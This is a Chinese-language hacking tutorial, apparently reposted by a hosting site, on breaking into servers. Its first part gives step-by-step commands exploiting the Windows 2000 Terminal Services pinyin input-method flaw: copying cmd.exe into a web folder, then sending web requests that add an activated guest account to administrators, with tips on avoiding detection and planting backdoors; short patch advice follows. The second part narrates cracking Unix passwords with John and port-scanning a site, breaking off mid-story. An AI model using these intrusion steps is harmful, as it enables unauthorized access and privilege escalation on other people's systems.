80端口、512端口、3389端口……入侵实例

　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　
　　389端口的入侵3389端口的入侵3389端口的入侵
　　　　　　　　　　　　　　　　　
　　由于微软对中国产品不付责任的态度，使得安装了终端服务和全拼的w2k服务器存在着远程登陆并能获取终极用户权限的严重漏洞。
　　其过程如下：
　　　　　　　　　　　　　　　　　
　　1.扫描3389 port终端服务默认；2.用终端客户端程式进行连接；3.按ctrl shift调出全拼输入法（其他似乎不行），点鼠标右键（假如其帮助菜单发灰，就赶快赶下家吧，人家打补丁了），点帮助，点输入法入门；4.在“选项”菜单上点右键——>跳转到URL“，输入：c：winntsystem32cmd.exe.（假如不能确定NT系统目录，则输入：c：或d：……进行查找确定）；5.选择”保存到磁盘“选择目录：c：inetpubs，因实际上是对方服务器上文档自身的复制操作，所以这个过程很快就会完成；6.打开IE，输入：http://ip/s/cmd.exe？/c dir怎么样？有cmd.exe文档了吧？这我们就完成了第一步；7.http://ip/s/cmd.exe？/c echo net user guest /active：yes>go.bat 8.http://ip/s/cmd.exe？/c echo net user guest elise》go.bat 9.http://ip/s/cmd.exe？/c echo net localgroup administrators /add guest》go.bat 10.http://ip/s/cmd.exe？/c type go.bat看看我们的批文档内容是否如下：
　　　　　　　　　　　　　　　　　
　　net user guest /active：yes net user guest elise net localgroup administrators /add guest 11.在“选项”菜单上点右键——>跳转到URL“，输入：c：inetpubsgo.bat ——>在磁盘当前位置执行；12.呵呵，大功告成啦，这样我们就激活了服务器的geust帐户，密码为：elise，终极用户呢！（我喜欢guest而不是建立新帐户，这样似乎不易被发现些），这样您就可用IPC$连接，想怎样做就怎样做了，当然，您也可用guest直接登陆到他的服务器，到他机器上去跳舞吧：-）
　　　　　　　　　　　　　　　　　
　　注意事项：1.当您用终端客户端程式登陆到他的服务器时，您的任何操作不会在他的机器上反应出来，但假如他正打开了终端服务管理器，您就惨了了：（这时他能看到您所打开的进程id、程式映象，您的ip及机器名，并能发消息给您！
　　2.当您连接时，会加重对方服务器的负荷，很容易造成对方死机和断线，所以您的操作快点为妙。
　　3.尽快做好后门，暂时不要上传任何程式，一是防止断线，二是防止对方打上补丁！
　　个人观点：1.在IE下，所拥有的只是iusr_machine权限，因而，您不要设想去做越权的事情，如启动telnet、木马等；2.url的跳转下，您将拥有终极用户的权限，好好利用吧3.跳转到哪个目录下，通常只能查看、执行当前目录的文档，不能进入到子目录，如想进入，再跳一次吧！：）
　　4.此法似乎和对方的防火墙无关哦！
　　5.据本人实际操作，发现极易断线，但应和占用服务器资源无关。对方是384M RAM PIII，是静态IP，主要是做数据库服务器，RAID硬盘，SCSI CD ROM，开机18天了，02：00进去时，仍时常吊线。
　　　　　　　　　　　　　　　　　
　　堵漏办法：1.打补丁；2.删掉全拼输入法，用标准就成了嘛^_^；3.服务中关掉：Terminal Services，服务名称：TermService，对应程式名：system32termsrv.exe；
　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　
　　512端口入侵
　　　　　　　　　　　　　　　　　
　　已是第六十几天了，我的Celeron 533仍不知疲倦的跑着JOHN……我是无意中注意到这个网站的，当时只是想看一下，方法是各位大虾都会的FINGER，然后猜用户口令进去的。进去之后PASSWD也没有SHADOWN，直接就能够看到，该系统用的是Digital unix系统，从PASSWD看得出里面的用户只有两个组：root和users，我猜中的就是一users级别的，发现这个级别的用户几乎没有什么权限，TELNET上去后发现/USR/USERS/XXX是各用户的HOME，而他们的属性全是drwx——，也就是说这里的用户是互不信任的关系（这一点大家在各免费主页服务器上经常能够看到），看来猜出再多用户级口令也没有用的。
　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　
　　root级的用户只有两名：root和shut.root我用john已跑了60多天，显然不可能再跑出来了，但幸运的是shut口令已跑出来了。我毫不犹豫的telnet上去——然后，网站就关闭了！@#~！#^%，我真笨，怎么没想到shut口令是干什么的？
　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　
　　网站很快就又开启了，我发现shut口令还是没改！这个网管是怎么当的，系统关了也不查一下原因！很显然，这个网站上只有root是有水平的，但他和服务器可能不在同地，对于开、关机之类的事情不能直接操纵，和是给当地的操作员一个root级帐号，然后在。profile文档中做了一个shell，使得帐号一登录就自动关系统。看看系统这么周密的设计，我想root设计这个shell时绝对关掉了path，所以我不打算在优先的path路径中放一同名的shell来阻止他。我假如能改掉这个文档再telnet上去不就是root级了吗？
　　　　　　　　　　　　　　　　　
　　但是shut的HOME目录是drwx——，别的帐号根本进不去。没关系，我试试ftp，530 user shut access denined（被拒绝），users组能够ftp上去同样进不了shut目录。而且该网站根本就没有开WWW服务，怎么办？为这个网站陆陆续续研究了许久，我总是乐观的鼓励自己，“起码我已知道几十种进不去的方法了……”。“真正的黑客从来都是把困难当作乐趣，敞开的大门您请他进他都不进呢！”如此六十多天过去了，只到有一天……
　　　　　　　　　　　　　　　　　
　　我再一次用haktek扫描该网站，结果如下：Port 21 found. Desc='ftp' Port 23 found. Desc='telnet' Port 25 found. Desc='smtp' Port 79 found. Desc='finger' Port 111 found. Desc='portmap/sunrpc' Port 512 found. Desc='biff/exec' Port 513 found. Desc='login/who' Port 514 found. Desc='shell/syslog' Port 515 found. Desc='printer' Port 1024 found. Port 1025 found. Port 1526 found. Port 1528 found.

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!